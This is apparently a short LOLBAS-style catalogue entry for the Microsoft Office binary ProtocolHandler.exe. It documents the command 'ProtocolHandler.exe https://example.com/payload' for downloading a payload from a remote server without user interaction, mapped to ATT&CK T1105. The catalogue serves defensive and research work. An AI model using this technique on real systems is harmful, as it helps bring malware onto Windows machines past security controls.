.. /ProtocolHandler.exe
Star

Download

Microsoft Office binary


Paths:

Acknowledgements:

Detection:

Download

  1. Downloads payload from remote server

    ProtocolHandler.exe https://example.com/payload
    Use case
    It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105